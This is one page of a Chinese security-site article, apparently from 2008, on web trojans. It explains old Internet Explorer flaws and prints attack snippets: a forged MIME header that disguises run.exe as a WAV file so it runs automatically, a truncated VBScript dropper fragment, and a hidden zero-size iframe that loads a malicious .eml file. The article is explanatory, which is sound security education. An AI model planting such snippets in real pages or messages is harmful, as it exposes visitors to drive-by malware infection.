今日精选 ·绝对解密 XP系统中隐藏的10个秘密 ·Windows系统文件详解【大全】 ·配置Windows Server 2008高级防火墙 ·带你现场体验专业服务器机房 ·屏蔽五项功能 让Windows XP极速狂飙 ·木马免杀技术大盘点 ·如何让无线路由信号更强更广 ·各大路由器默认密码(完美汇总经典版) ·如何构建安全的入侵检测系统 ·电脑故障维修判断指导大全(联想内部文件) >>>>
编程开发  Java | .Net | C/C++ | Delphi | VC/VB | XML | ASP | PHP
数据库  Oracle | Mysql | DB2 | Sql server
应用方案 无线网络方案 | 有线网络方案 

网管天地  网吧管理 | 路由器 | 交换机 | 服务器
网络安全  黑客技术 | 病毒漏洞 | 网站安全 | 服务器安全 | 入侵防御 | 防火墙
操作系统 Linux/Unix | Windows 
您现在的位置: 企业网络安全 >> 文章·资讯 >> 互联网安全 >> 网站安全 >> 文章正文
国内资深黑客详谈网页木马
作者:子明 文章来源:51CTO.com 点击数: 更新时间:2008-5-20 10:57:47

 

2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头

  常用的攻击代码:

  

      Content-Type: multipart/related;
  type="multipart/alternative";
  boundary="====B===="
  --====B====
  Content-Type: multipart/alternative;
  boundary="====A===="
  --====A====
  Content-Type: text/html;
  Content-Transfer-Encoding: quoted-printable
  --====A====--
  --====B====
  Content-Type: audio/x-wav;
  name="run.exe"
  Content-Transfer-Encoding: base64
  Content-ID: ---以下省略AAAAA N+1个---
  把run.exe的类型定义为audio/x-wav,这是利用客户端支持的 MIME(多部分网际邮件扩展,Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,,结果导致邮件文件x.eml中的附件run.exe被执行。在win2000上,即使是用鼠标点击下载下来的 x.eml,或是拷贝粘贴,都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer-Encoding: base64 Content-ID: 从中可以看出,由于定义后字符格式为base64,那么一下的代码全部为加密过的代码,里面可以是任何执行的命令:

  

    〈script language=vbs〉
  On Error Resume Next• 容错语句,避免程序崩溃
  set aa=CreateObject("WScript.Shell")•建立WScript对象
  Set fs = CreateObject("Scripting.FileSystemObject")•建立文件系统对象
  Set dir1 = fs.GetSpecialFolder(0)•得到Windows路径
  Set dir2 = fs.GetSpecialFolder(1)•得到System路径
  ……省略……
  之所以有的病毒不能准确的清除全部的病毒体,是因为很多杀毒软件,病毒监控只杀当时查到的,却不能处理新建的文件。

  3.Iframe 漏洞的利用

  常用攻击代码:

  

〈iframe src=run.eml width=0 height=0〉〈/iframe〉
  常见的木马运用格式,高度和宽度为0的一个框架网页。

  一个框架引用的新方式,对type="text/x-scriptlet" 的调整后,就可以实现和eml格式文件同样的效果。

  4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用

  常见攻击代码:

 

      ----- code cut start for run.asp -----
  ----- code cut end for run.asp -----

 

上一页  [1] [2] [3] [4] [5] [6] [7] [8] 下一页


免责声明:作品版权归所属媒体与作者所有!!本站刊载此文不代表同意其说法或描述,仅为提供更多信息。如果您认为我们侵犯了您的版权,请告知!本站立即删除。有异议请联系我们。
文章录入:security    责任编辑:security 
  • 上一篇文章:
  • 下一篇文章: 没有了
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告 |